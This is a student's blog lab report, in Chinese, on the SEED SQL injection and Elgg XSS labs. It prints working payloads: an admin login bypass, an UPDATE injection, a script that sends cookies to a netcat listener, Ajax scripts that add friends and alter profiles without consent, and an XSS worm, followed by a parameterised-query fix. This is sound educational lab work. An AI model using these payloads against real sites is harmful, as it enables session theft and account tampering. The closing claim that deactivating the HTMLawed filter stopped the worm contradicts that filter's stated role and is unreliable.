NukeSong

导航

20252801 2025-2026-2 《网络攻防实践》实践十报告

1.实验内容

一、SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
SQL对抗:修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
弹窗显示cookie信息:将cookie信息显示。
窃取受害者的cookies:将cookie发送给攻击者。
成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

2.实践过程

2.1 准备阶段

准备指定ubuntu版本:https://pan.baidu.com/s/1n03UXz1vAWFfyB8oeLvFpQ?pwd=36r6
image
具体安装流程如图:
image
稍后安装系统;
image
image
image
一路点击下一步,直至:
image
(也许选那个2KB的?)
image
启动=>我已完成安装!
image
修改主机名为自己姓名
hostname yejiangqi
image

2.2 SEED SQL注入攻击与防御实验

2.2.1 数据库基本概况查询

1、登录数据库并展示库。密码为seedubuntu
image
show databases查看已有的数据库
image
2.查看Users数据库和里面的表。发现确实有一个名为creditential的表。
use Users;
show tables;
image
3.查询当前表的所有内容
select * from credential;(有点熟悉の语法?!)
image
4.输入条件,查询Name为‘Boby’的相关信息。
select * from credential where Name = 'Boby';
image

2.2.2 对SELECT语句的SQL注入攻击

1.浏览器打开 www.SEEDLabSQLInjection.com 网页。
image
2.右键查看网页源码,选择view page source
image
发现登陆的表单中使用 get 方法访问 unsafe_home.php
image
3、相关的文件可以利用文件夹进行查看,其地址为:/var/www/SQLInjection/unsafe_home.php。
通过下面两个图我们可以看到,该程序针对admin和普通用户具有不同的处理方法。
(当然关于代码打开方式,我一开始以为浏览器能直接查看QAQ,实际上它就在本机上)
image
image
4、因此针对程序代码,我们可以构造 Admin'#,并让 $input_uname 等于该值,这样会使得#后的Password判断不会执行(在sql语句中,#表示注释)。通过这样的方法我们便可以在不知道密码的情况下以admin用户进行登录,如下图,密码随机输入:
(这让我想起Java中JDBC构建数据库时,遇到的一个问题)
image
不用密码可以直接登录(最早期的病毒之一bush)
image

2.2.3 对 UPDATE语句的SQL注入攻击

1、首先查看 Edit_Profile 页面的源代码。点击上方的 Edit Profile 进入更新页面,然后右键查看源代码。
image
2、从下图我们看到,表单依旧是以 get 方式将数据发到 unsafe_edit_backend.php 页面。
image
3.跟上一个类似,依旧是用文件夹查看 unsafe_edit_backend.php 页面,其地址为: /var/www/SQLInjection/unsafe_edit_backend.php。
打开并阅读源代码
image
我们可以看到UPDATE更新语句处,我们可以通过构造 $input_nickname 的值来进行SQL注入攻击。我们可以使 $input_nickname 的值等于 ', Salary='20252801' where name='Admin'; #,也就是把Admin的Salary改为20252801
4、在NickName处输入 ', Salary='20252801‘ where name='Admin'; #
结果如下图所示:
image

2.2.4 SQL对抗:修复上述SQL注入攻击漏洞

本实验中修改sql语句的方法,是将参数与需要执行的动作或条件分开,从而避免的了sql注入的风险。
(1)在SELECT语句中,使用bind_param方法,将参数与执行动作或条件分开进行修改;
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?"); $sql->bind_param("ss", $input_uname, $hashed_pwd);
(2)在Update语句中,同样使用bind_param方法,将参数与执行动作或条件分开进行修改;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;"); $sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

2.3 SEED XSS跨站脚本攻击实验(Elgg)

2.3.1 发布恶意消息,显示警报窗口

1、首先在浏览器中访问 http://www.xsslabelgg.com
image

2、使用账号:Alice,密码:seedalice 进行登录。
image

3、点击Alice头像进入主页,再选择 Edit profile,最后在 Brief description中输入XSS攻击代码 。
image
输入:<script>alert("20252801yjq");</script>
image

4.点击保存,发现弹出xss警告弹窗。
image

2.3.2 弹窗显示cookie信息:将cookie信息显示。

将Brief description中的信息更改,点击保存则可以弹出cookie信息。
<script> alert(document.cookie);</script>
image

image

2.3.3 窃取受害者的cookies:将cookie发送给攻击者

在命令行开启监听。将Brief description中的信息更改,点击保存。再登录boby的账户,查看alice账户信息时成功窃取到了boby用户的cookies。
窃取当前网页的 Cookie,并发送到本地 5555 端口的监听程序上。
(这里借鉴了汤同学的做法)
nc -l 5555 -v
<script> document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>'); </script>
image
image

2.3.4 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程

1.在alice账户中选择“more”-“Members”,按F12查看网络流信息,选择boby添加为朋友,发现编号信息。
image
2.删掉好友回到初始状态。根据上述信息构造payload,在alice账户的about me中填写,并保存。
页面加载后会偷偷调用目标网站接口,自动帮当前登录用户关注 ID 为 44或者45 的用户,全程用户无感知。
44代表自身,45代表boby

点击查看代码 
<script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;


    //Construct the HTTP request to add Samy as a friend.
    var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

    //Create and send Ajax request to add friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    Ajax.send();
}
</script>

image
3.登录alice的主页,发现已经和自己以及boby成为好友
image

2.3.5 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改

在alice账户的about me中填写,并保存。
获取当前登录用户的身份信息、安全令牌,构造篡改个人资料的请求,自动悄悄发送请求,把用户简介改成:I am YJQ.
构造修改信息xss攻击代码,并输入Alice中about me中edit HTML模式:
<script type="text/javascript"> window.onload = function(){ //JavaScript code to access user name, user guid, Time Stamp __elgg_ts //and Security Token __elgg_token var userName=elgg.session.user.name; var guid="&guid="+elgg.session.user.guid; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; var content=token+ts+"name="+userName+"&description=<p>I am YJQ.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid; var sendurl = "http://www.xsslabelgg.com/action/profile/edit"; var aliceGuid=45; if(elgg.session.user.guid!=aliceGuid){ //Create and send Ajax request to modify profile var Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(content); } } </script>
结果如下图所示:
image

2.3.6 编写XSS蠕虫

1.在alice账户的about me中填写,并保存。
这是一段XSS蠕虫病毒代码,不仅会偷偷篡改个人资料,还会把自身代码复制到个人简介里,实现自我复制、无限传播,访问者打开页面就会中招。

点击查看代码 
`<script type="text/javascript">
	window.onload = function(){
		//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
		//and Security Token __elgg_token
		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "name=" + userName + "&description=<p>I am YJQ</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)
		//FILL IN
		var samyGuid=44;
		//FILL IN
		if(elgg.session.user.guid!=samyGuid)
		{
			//Create and send Ajax request to modify profile
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	}
</script>
`

2.将这段xss蠕虫代码放入Alice的About me中,并点击保存。
image

3.登录Boby账号,访问Alice主页。发现已经被感染。(好高级啊!)
image

2.3.7 编写XSS蠕虫

1.管理员登录平台,账号Admin,密码seedelgg
image
2.找到Account->Administration->plugins
image
3.找到插件 HTMLawed ,将其关闭,设为 Deactivate 状态,该插件主要是用来校验用户的输入输出,并且可以自动删除特定的标签
image
4.再次登录Boby账号,发现XSS蠕虫攻击已经失效
image

3.学习中遇到的问题及解决

  • 1.ubuntu系统安装
    解决方法:依靠老师与同学提供的百度云资源包解决
  • 2.本机复制的信息,虚拟机无法获取
    解决方法:1.手敲(功夫不负有心人) 2.共享文件夹(感谢 https://www.cnblogs.com/tangxinci/p/19954092
  • 3.unsafe_home.php文件不能编辑
    解决方法:chmod u+w 授权即可

4.学习感想和体会

这次学习使我充分意识到了网页端浏览内容的风险隐患,感谢当代IT开发者的贡献,为我们安全上网保驾护航!

posted on 2026-05-08 23:44  琴雇  阅读(96)  评论(0)    收藏  举报